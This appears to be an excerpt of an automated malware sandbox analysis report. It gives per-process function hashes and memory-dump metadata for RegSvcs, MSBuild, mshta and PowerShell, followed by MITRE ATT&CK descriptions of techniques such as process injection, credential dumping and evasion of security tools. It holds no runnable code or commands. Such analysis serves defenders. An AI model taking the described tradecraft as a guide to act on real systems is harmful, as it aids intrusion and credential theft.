Uniqueness

Uniqueness Score: -1.00%

Function 067926BE Relevance: 5.2, Strings: 4, Instructions: 157COMMON

Download Yara Rule

Strings

$]q, xrefs: 067926F9
$]q, xrefs: 067927B7
$]q, xrefs: 06792A13
$]q, xrefs: 06792705

Memory Dump Source

Source File: 00000005.00000002.3310908949.0000000006790000.00000040.00000800.00020000.00000000.sdmp, Offset: 06790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6790000_RegSvcs.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: d429b67ba58c8b96c4debb8e58df4051b4c8821cc827acc7df299476107a549c
Instruction ID: ff76a2f63ec2495dcffd1b1e0a9ef638eb9beb885011b0b55b01f8a79ddd3870
Opcode Fuzzy Hash: d429b67ba58c8b96c4debb8e58df4051b4c8821cc827acc7df299476107a549c
Instruction Fuzzy Hash: A3518330A24115EFEFA4EB68E554B7D77F2AF40300F308466D5269B697DB348A41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 067A0BCA Relevance: 5.1, Strings: 4, Instructions: 89COMMON

Download Yara Rule

Strings

$]q, xrefs: 067A0FE3
[r, xrefs: 067A0C06
tM), xrefs: 067A0CCA
$]q, xrefs: 067A0F32

Memory Dump Source

Source File: 00000005.00000002.3311321613.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_67a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: [r$tM)$$]q$$]q
API String ID: 0-1355478060
Opcode ID: 49fe1f1550874622abcffb00ab623b5224dcc0ba36c218b354e186ce69a69712
Instruction ID: ccc6756bd5e58520297178318f8945bee0aa93a869373d00ac433f434d1241e9
Opcode Fuzzy Hash: 49fe1f1550874622abcffb00ab623b5224dcc0ba36c218b354e186ce69a69712
Instruction Fuzzy Hash: 90318030A043548FEB958B24C954BAE77B3EB84304F54C6A9E54EAB385C7759D81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0670FE80 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\Yr, xrefs: 0670FEB5
[Yr, xrefs: 0670FED2
_Yr, xrefs: 0670FF02
[Yr, xrefs: 0670FEEA

Memory Dump Source

Source File: 00000005.00000002.3307649124.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6700000_RegSvcs.jbxd

Similarity

API ID:
String ID: [Yr$[Yr$\Yr$_Yr
API String ID: 0-1119274631
Opcode ID: 6b1e3a8b3666619f263e687950699cd9ef98626144af23d5e2c08eef792675a5
Instruction ID: cd4ca977c97c263ded89946aa00fae6537160bc1867d8f1c0dcc3a92dc037e7f
Opcode Fuzzy Hash: 6b1e3a8b3666619f263e687950699cd9ef98626144af23d5e2c08eef792675a5
Instruction Fuzzy Hash: 4A0184317405018BF75876799912B2E26D7DBC0710F14C539E21F8B2CACE6CA94297D2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 6784, Parent PID: 5012COMMON

Executed Functions

Function 013205E0 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2221891793.0000000001320000.00000040.00000020.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1320000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac69a0e892d6459d86bbe3ffbff841e1c81a34a694d5b9311447221214b3dee
Instruction ID: fc31864a3c6a11ad1fc6dfafa0b12cef96dfa3d49c18d1cf5862fc630920ab50
Opcode Fuzzy Hash: 3ac69a0e892d6459d86bbe3ffbff841e1c81a34a694d5b9311447221214b3dee
Instruction Fuzzy Hash: 7301A9B65097806FD711CF059C44862FFB8DF86520709C49FEC498B652D135A919CB72

Uniqueness

Uniqueness Score: -1.00%

Function 01320606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2221891793.0000000001320000.00000040.00000020.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1320000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572332478e7ea3583b4920d3923571896532490b431e7632f391b9cc0a6e01a1
Instruction ID: b6884cae9cf1b5d66dfe3383912aab045f896bd29204657d936b47a2d0d73fe7
Opcode Fuzzy Hash: 572332478e7ea3583b4920d3923571896532490b431e7632f391b9cc0a6e01a1
Instruction Fuzzy Hash: 80E092B66006009B9750CF0AED45452F7D8EB84630708C47FDC0D8B701D235B518CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00FC23F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2214472037.0000000000FC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fc2000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765874a40b336e5ca5cbb355bfb096c1978ad1be14fb23d06a2cecf140bd16fe
Instruction ID: b215da9b6c7e339f7eaf91bec7ba84a0b11c003453da364ee261edd06608fb1f
Opcode Fuzzy Hash: 765874a40b336e5ca5cbb355bfb096c1978ad1be14fb23d06a2cecf140bd16fe
Instruction Fuzzy Hash: 32D05E7A6056C24FD31ADA1CC2A9F953BE4AB51724F4A44FDA8008B763C768E9C1E600

Uniqueness

Uniqueness Score: -1.00%

Function 00FC23BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2214472037.0000000000FC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fc2000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e2215744fc9447589612ccf9c44969496d7af39e6751250d30660a1e4451909
Instruction ID: c8cf98222203563b5556126d06a8467489e2dbb739b80e4782f07ff5d7f25435
Opcode Fuzzy Hash: 9e2215744fc9447589612ccf9c44969496d7af39e6751250d30660a1e4451909
Instruction Fuzzy Hash: 30D05E347002C24BCB19DA1CC3D9F5937D4AB40724F0644ECAC108B762C7A8E8C0DA00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 1100, Parent PID: 5012COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00F0A230 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 00F0A290

Memory Dump Source

Source File: 00000008.00000002.2396359939.0000000000F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f0a000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2b7dc0a406c21dd2b969b69e186a0c599d3ebd2e01c6da7e4bcf49ce658e591c
Instruction ID: d46a0d5f97528e2734ffd53c44685fcc8c50235b10e9f7f2c69634aed07a9cdf
Opcode Fuzzy Hash: 2b7dc0a406c21dd2b969b69e186a0c599d3ebd2e01c6da7e4bcf49ce658e591c
Instruction Fuzzy Hash: B4114F714093C09FDB128B15DD54A62BFB4DF47624F0880DAED858F6A3D265A908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F0A25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 00F0A290

Memory Dump Source

Source File: 00000008.00000002.2396359939.0000000000F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f0a000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5f31e77afcb654f25a4eee5671b913360681004c8e15c2a98918323b1363d669
Instruction ID: b136305a957eb60a9cad141e7607a96b95593bcc03982b2540c177dd72431beb
Opcode Fuzzy Hash: 5f31e77afcb654f25a4eee5671b913360681004c8e15c2a98918323b1363d669
Instruction Fuzzy Hash: 3BF0AF36904740CFEB10CF45D988761FBE4EF04720F08C0AADD094B796D2B6E808EEA2

Uniqueness

Uniqueness Score: -1.00%

Function 011105E1 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2396629570.0000000001110000.00000040.00000020.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1110000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ede1214a6ab7a5d471f51061166b5de47bbfb94c6ea4abf85b9d759273faae
Instruction ID: a9bb66b56f18856183a3c641c62e921ff7ce4fc49fdb47083cb8c074a3e857aa
Opcode Fuzzy Hash: e9ede1214a6ab7a5d471f51061166b5de47bbfb94c6ea4abf85b9d759273faae
Instruction Fuzzy Hash: 8B0186B65097806FD7118F05AC45862FFA8DB86530709C59FEC498B652D129A909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 01110606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2396629570.0000000001110000.00000040.00000020.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1110000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e249631a7232eb1772a914c1fbada131bc24f5200105c3431ca0c4d81fa521
Instruction ID: 852894aeee6b63f95b9cde83ce2a6bfc622e1285d8112bd149c268cbcfa5294b
Opcode Fuzzy Hash: e2e249631a7232eb1772a914c1fbada131bc24f5200105c3431ca0c4d81fa521
Instruction Fuzzy Hash: 65E092B66006004B9654CF0AFD85462F7D8EB84630708C47FDC0D8BB05D275B508CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F023F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2396327569.0000000000F02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f02000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1c62486b188533670420067133c620f1034ffd86fab354f7db92f5df3fb203
Instruction ID: d8862765e0050a1fb48fb01badf9dc68880eb2565cd72081455b38154eab6369
Opcode Fuzzy Hash: 0c1c62486b188533670420067133c620f1034ffd86fab354f7db92f5df3fb203
Instruction Fuzzy Hash: 47D05E796056C14FD316DA1CC2ACB953BD4AB51724F4A44F9AC008B7A3C768E9C1E610

Uniqueness

Uniqueness Score: -1.00%

Function 00F023BC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2396327569.0000000000F02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F02000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_f02000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a54838a0c9518ab5600ff4744492d7a3c57a16b08f6710b9d47ece8175a7d1
Instruction ID: 5494113762944e986c2a66a3168c580f26f31560823e665761e86f2027c63586
Opcode Fuzzy Hash: 90a54838a0c9518ab5600ff4744492d7a3c57a16b08f6710b9d47ece8175a7d1
Instruction Fuzzy Hash: C4D05E346002814BCB15DA1CD2D8F5937D8AB40724F0644E8AC108B7A2C7B8E8C0EA10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 5836, Parent PID: 5012COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0170A230 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 0170A290

Memory Dump Source

Source File: 00000009.00000002.2385274172.000000000170A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_170a000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: aeb77ecb3a6b1d5870ff503e72ab446507b378c7c1cb357267e3aacc89e54790
Instruction ID: fb4c39fe1df92929e3788e749437a64999af6ef25efe5c358c52dbc106a367a2
Opcode Fuzzy Hash: aeb77ecb3a6b1d5870ff503e72ab446507b378c7c1cb357267e3aacc89e54790
Instruction Fuzzy Hash: 79113D754093C09FDB128B15DD54A62BFB4DF47614F0880DAED858F2A3D265A908DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0170A25E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(?), ref: 0170A290

Memory Dump Source

Source File: 00000009.00000002.2385274172.000000000170A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_170a000_MSBuild.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 333406f59d37517a5bba8ab5758396a9be33cfa765bda280bad7a3f49175c878
Instruction ID: 8e5a8e184fc1f793844f1af27e059be72aa349927b677dceafdb8f8e2e10272f
Opcode Fuzzy Hash: 333406f59d37517a5bba8ab5758396a9be33cfa765bda280bad7a3f49175c878
Instruction Fuzzy Hash: 2EF0AF35908740CFEB21CF45D988761FBE4EF48720F08C0AADD094B792D276A408CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 017905E0 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2385612225.0000000001790000.00000040.00000020.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1790000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d552427335327c14f209dc5225fa2b13a09deb0d4fd4ad8f1008ee6f94283448
Instruction ID: 35649bc41b5da8258bec8747f99857a336305453d284832e9bcae1f2536998d2
Opcode Fuzzy Hash: d552427335327c14f209dc5225fa2b13a09deb0d4fd4ad8f1008ee6f94283448
Instruction Fuzzy Hash: 400149B54087C06FC311CF45AC40893FFE8DF8623070985ABF8888B652C134B909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01790606 Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2385612225.0000000001790000.00000040.00000020.00020000.00000000.sdmp, Offset: 01790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1790000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df01a6210ffa787e13d7123b212bfadbff2159c48ce6f6fb09dc82f076e4062
Instruction ID: 146b870f9c08a7651aa368889423e3a40faa452a28f6f230ee0166ff67fd4cd6
Opcode Fuzzy Hash: 6df01a6210ffa787e13d7123b212bfadbff2159c48ce6f6fb09dc82f076e4062
Instruction Fuzzy Hash: 46E092BAA006004B9650CF0AED85462F7D8EB88630708C47FDC0D8B701E235B508CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 017023F4 Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2385237449.0000000001702000.00000040.00000800.00020000.00000000.sdmp, Offset: 01702000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1702000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced3a98cf0513dc28b8e7050369cb3814383f82155699200e06e894031b4ebbd
Instruction ID: 5a5b14bf229f6893a745b63f15fd2fe9dffd5580dc99158ebca0fdb70731bba2
Opcode Fuzzy Hash: ced3a98cf0513dc28b8e7050369cb3814383f82155699200e06e894031b4ebbd
Instruction Fuzzy Hash: AFD05E7A3057C18FE3179A1CC2ACB957BE4AB51714F5B44F9AC008B7A3C768E9C1D600

Uniqueness

Uniqueness Score: -1.00%

Function 017023BC Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.2385237449.0000000001702000.00000040.00000800.00020000.00000000.sdmp, Offset: 01702000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1702000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f14189d2cd4310252c3108181457fbf7458885c04358f44edc8d77d4711d7e8
Instruction ID: 9a823e232656be30654bb1c42798389dab544698cc621f593f0d6002b6438aab
Opcode Fuzzy Hash: 6f14189d2cd4310252c3108181457fbf7458885c04358f44edc8d77d4711d7e8
Instruction Fuzzy Hash: AFD05E352002818BDB16DA1CD2D8F59BBD8AB40714F0644E8AC108B7A2C7B4E8C0CA00

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exePID: 5392, Parent PID: 1068COMMON

Executed Functions

Function 00000219E4D20FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.2335927034.00000219E4D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000219E4D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_219e4d20000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: f147db9a3c652110e0be141083f1ce4a33c80f550d8f7a3f4688eb66a2092fe4
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 399004144D540F55D41551D14C5D3DC504073DD150FD4C4C3C517D1544D44F13D711D7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7196, Parent PID: 5392COMMON

Executed Functions

Function 00007FF848F43D95 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2331221306.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
Instruction ID: a595da5180462ad958e9558f25a06545270c3b0d55f8ed8927ff596cfaa69e36
Opcode Fuzzy Hash: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
Instruction Fuzzy Hash: E501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exePID: 7820, Parent PID: 1068COMMON

Executed Functions

Function 000001F42A700FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000003.2651354954.000001F42A700000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F42A700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_3_1f42a700000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 88160856581e93bd4c85217e026876d4d8005e121cb2a26fc562442de97e79ff
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 7690021449540756D51455E11C452AD504163C8360FD444A1581690144D84D52972156

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
